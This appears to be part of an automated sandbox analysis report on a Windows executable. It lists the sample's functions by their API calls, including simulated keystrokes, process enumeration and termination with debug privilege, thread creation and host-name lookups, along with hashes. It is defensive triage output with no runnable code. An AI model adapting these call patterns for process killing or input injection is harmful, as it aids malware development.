                                                            • Part of subcall function 00183A3D: GetCurrentThreadId.KERNEL32 ref: 00183A5E
                                                            • Part of subcall function 00183A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001825B3), ref: 00183A65
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 001825BD
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001825DB
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001825DF
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 001825E9
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00182601
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00182605
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0018260F
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00182623
                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00182627
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 176e1bd5071e62eccfb465eec189e82091ff87afd4978b784f03ac558af5f572
                                                          • Instruction ID: 1aec96ee07a776cf76640a874374f54ff031e1d0f0e5c3d348ba0ebbaa869dd5
                                                          • Opcode Fuzzy Hash: 176e1bd5071e62eccfb465eec189e82091ff87afd4978b784f03ac558af5f572
                                                          • Instruction Fuzzy Hash: F501D470390610BBFB107768DC8AF993F59DB5EB12F100102F368AF1D1CAF225848EA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00181449,?,?,00000000), ref: 0018180C
                                                          • HeapAlloc.KERNEL32(00000000,?,00181449,?,?,00000000), ref: 00181813
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00181449,?,?,00000000), ref: 00181828
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00181449,?,?,00000000), ref: 00181830
                                                          • DuplicateHandle.KERNEL32(00000000,?,00181449,?,?,00000000), ref: 00181833
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00181449,?,?,00000000), ref: 00181843
                                                          • GetCurrentProcess.KERNEL32(00181449,00000000,?,00181449,?,?,00000000), ref: 0018184B
                                                          • DuplicateHandle.KERNEL32(00000000,?,00181449,?,?,00000000), ref: 0018184E
                                                          • CreateThread.KERNEL32(00000000,00000000,00181874,00000000,00000000,00000000), ref: 00181868
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 6c5ae66697c3b0a0813f849eb2c3bea850f85537ab6b648083b5969f7171f169
                                                          • Instruction ID: c614394d5911d13a38e82b80723e496d44e72fbee17f07cf7199c3dd7fd6286a
                                                          • Opcode Fuzzy Hash: 6c5ae66697c3b0a0813f849eb2c3bea850f85537ab6b648083b5969f7171f169
                                                          • Instruction Fuzzy Hash: D301ACB5240304FFE610AFA5DC49F573BACEB89B11F404511FA05EB5A1C67098408B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0018D501
                                                            • Part of subcall function 0018D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0018D50F
                                                            • Part of subcall function 0018D4DC: CloseHandle.KERNEL32(00000000), ref: 0018D5DC
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001AA16D
                                                          • GetLastError.KERNEL32 ref: 001AA180
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001AA1B3
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 001AA268
                                                          • GetLastError.KERNEL32(00000000), ref: 001AA273
                                                          • CloseHandle.KERNEL32(00000000), ref: 001AA2C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: adc4c23daab67ce5494ee6d720eab1bf2e5a990b060b14b73f430af06fa6b008
                                                          • Instruction ID: 1503cbd45dfc430195a59205008f046c8e1463122b4d8d16faac2027a299992c
                                                          • Opcode Fuzzy Hash: adc4c23daab67ce5494ee6d720eab1bf2e5a990b060b14b73f430af06fa6b008
                                                          • Instruction Fuzzy Hash: F461A034204242AFD720DF18D494F2ABBE1AF55318F54849DE4668BBA3C772ED49CBD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001B3925
                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001B393A
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001B3954
                                                          • _wcslen.LIBCMT ref: 001B3999
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001B39C6
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001B39F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcslen
                                                          • String ID: SysListView32
                                                          • API String ID: 2147712094-78025650
                                                          • Opcode ID: b10f36472266a05a09cb5b8da550cab61432e9b5a7e7975e4c50d76e7dd8d7b1
                                                          • Instruction ID: d89d327ffcef15e57ccd27f5289fb096d48b6bec215202c2478d8c774f6d721c
                                                          • Opcode Fuzzy Hash: b10f36472266a05a09cb5b8da550cab61432e9b5a7e7975e4c50d76e7dd8d7b1
                                                          • Instruction Fuzzy Hash: D941A571A00219BBEF219F64CC49FEA7BA9FF18354F100526F968E7291D7B19D90CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0018BCFD
                                                          • IsMenu.USER32(00000000), ref: 0018BD1D
                                                          • CreatePopupMenu.USER32 ref: 0018BD53
                                                          • GetMenuItemCount.USER32(01787028), ref: 0018BDA4
                                                          • InsertMenuItemW.USER32(01787028,?,00000001,00000030), ref: 0018BDCC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                          • String ID: 0$2
                                                          • API String ID: 93392585-3793063076
                                                          • Opcode ID: 4ac2a96edec609bcc727d418ab338cafd78a454806c08aadb4f941fc81056a6d
                                                          • Instruction ID: ccb46beee5bfe436cb29d95b99e1f5a70cd7b8a9dc46b8a660132e72891cb956
                                                          • Opcode Fuzzy Hash: 4ac2a96edec609bcc727d418ab338cafd78a454806c08aadb4f941fc81056a6d
                                                          • Instruction Fuzzy Hash: 31519E70A08205ABDB20EFE8D8C4BAEBBF4AF55318F144319E451972A1D7709A45CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0018C913
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: a585bbe0b5f6c9d2309572c5db1076678067cb7b0078a295dec10599d5a0db8b
                                                          • Instruction ID: ef30db56b92468008dff9a89eb80bde28c1b4a976cf1d01156096260296418a4
                                                          • Opcode Fuzzy Hash: a585bbe0b5f6c9d2309572c5db1076678067cb7b0078a295dec10599d5a0db8b
                                                          • Instruction Fuzzy Hash: F7115B31A89B06BBE7047B109C83DAE339CDF25368B61006FF500A6282E7745F405BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 642191829-3771769585
                                                          • Opcode ID: 5d4f524108d7a40b633312a05497f12fd20b5cddd9bf408888f22d85f173e710
                                                          • Instruction ID: b6bf12f8e2827c5c32808a4c603ebd30b0edc1c4b161d7b0bb563cab3f02680b
                                                          • Opcode Fuzzy Hash: 5d4f524108d7a40b633312a05497f12fd20b5cddd9bf408888f22d85f173e710
                                                          • Instruction Fuzzy Hash: AE112971904205AFDB24BB24EC4AEEE77BCDF25710F0101A9F545AA0E1EF719B818FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$LocalTime
                                                          • String ID:
                                                          • API String ID: 952045576-0
                                                          • Opcode ID: 99ad88c685b92c906161a3196ae2c671ebc3610d8bc6785da650bcdef6d86b19
                                                          • Instruction ID: 3529a9db8a5f48c746a3cd6ac99ee9f00e85527cca843f39e134f8c718cc617c
                                                          • Opcode Fuzzy Hash: 99ad88c685b92c906161a3196ae2c671ebc3610d8bc6785da650bcdef6d86b19
                                                          • Instruction Fuzzy Hash: 20418D65C1021876CB11FBF4C88AADFB7A8AF55710F508562E518E3122EB34E356C7A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 0013F953
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 0017F3D1
                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 0017F454
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 64799ff2638b5475c076af817abad68f860323b0d77a95cd12030801374039cf
                                                          • Instruction ID: 00be9d804179fe2323b937159a676fddcf2c26199082bf9c9ff098d5463a7403
                                                          • Opcode Fuzzy Hash: 64799ff2638b5475c076af817abad68f860323b0d77a95cd12030801374039cf
                                                          • Instruction Fuzzy Hash: 7E41DA31A08640FBD7399B29888877B7BA2BB56328F15853CF04B56A61D772A8C3C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 001B2D1B
                                                          • GetDC.USER32(00000000), ref: 001B2D23
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B2D2E
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 001B2D3A
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001B2D76
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001B2D87
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001B5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001B2DC2
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001B2DE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 4c259c9052369133f401269ba9402dd3e5e240d646cd814a92147e6ed0351dd4
                                                          • Instruction ID: 92641ccd2a83552f5bdfe0309570c3b4926e21f08707b65cce1ffe892c8a556c
                                                          • Opcode Fuzzy Hash: 4c259c9052369133f401269ba9402dd3e5e240d646cd814a92147e6ed0351dd4
                                                          • Instruction Fuzzy Hash: 65316976201214BBEB218F54CC8AFEB3BA9EF49715F044155FE089A291C7B59C91CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: cdd739d17407bf104862cae28731c0475ae518ed15e89e6936ef72364d1448f8
                                                          • Instruction ID: a9a31faa9b24f5a2beaecf2115ee520707d39cbc6eb92204eb390f2470096ede
                                                          • Opcode Fuzzy Hash: cdd739d17407bf104862cae28731c0475ae518ed15e89e6936ef72364d1448f8
                                                          • Instruction Fuzzy Hash: 3121A761650A0977D7187920CE82FFA375FFF20394FA44024FD049A581F721EF518BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 1d1c3a2dcd657bd12aec6e4488230a79771d522357592f727f944fa0675af214
                                                          • Instruction ID: 9e4df753db8df8e3b31a5cd9b42c17350f472f36644424104dfceda2c1549c7b
                                                          • Opcode Fuzzy Hash: 1d1c3a2dcd657bd12aec6e4488230a79771d522357592f727f944fa0675af214
                                                          • Instruction Fuzzy Hash: CFD1D479A0460AAFDF14CFA8C880BAEB7B6FF49344F158069F915AB281D770DD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCPInfo.KERNEL32(?,?), ref: 001615CE
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00161651
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001616E4
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001616FB
                                                            • Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00161777
                                                          • __freea.LIBCMT ref: 001617A2
                                                          • __freea.LIBCMT ref: 001617AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 2829977744-0
                                                          • Opcode ID: a791097c9a1fa0b75b1baef5c8385e090dae8768e5e8b5a3bfe6ee5aec96019d
                                                          • Instruction ID: a3a932f143ebb9e3da5e3e60e3ba04017b00e5958a5cd144d50bde62725f7514
                                                          • Opcode Fuzzy Hash: a791097c9a1fa0b75b1baef5c8385e090dae8768e5e8b5a3bfe6ee5aec96019d
                                                          • Instruction Fuzzy Hash: 8591D372E00216BADB248EB4CC91AEEBBB5AF49310F1C4659E902E7190DB35CD54CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2610073882-625585964
                                                          • Opcode ID: 9abdb6a2bdbfca7ffb80053c89606008f8ae4e192cc0a5c2e47adddfc58dc019
                                                          • Instruction ID: ec4e6a3cda8f17a17db68ee718ef256940582fbc1cd0b1899e8028e3d41bf01c
                                                          • Opcode Fuzzy Hash: 9abdb6a2bdbfca7ffb80053c89606008f8ae4e192cc0a5c2e47adddfc58dc019
                                                          • Instruction Fuzzy Hash: 6191AF75E00219AFDF24CFA5D884FAEBBB8EF86710F108559F505AB281D7B09945CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0019125C
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00191284
                                                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001912A8
                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001912D8
                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0019135F
                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001913C4
                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00191430
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                          • String ID:
                                                          • API String ID: 2550207440-0
                                                          • Opcode ID: 3ea6df30640e81ea5b44198762349aaad276c9c6324ceaf7f7ef8c2153e1d93b
                                                          • Instruction ID: 40af2da8e853c9515507d4014bb218170a0530a4e8d9582a77ed25b6c2086453
                                                          • Opcode Fuzzy Hash: 3ea6df30640e81ea5b44198762349aaad276c9c6324ceaf7f7ef8c2153e1d93b
                                                          • Instruction Fuzzy Hash: 7491D575A0021AAFDF01DFA4C885BFE77B5FF58315F214429E900EB291D774A981CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
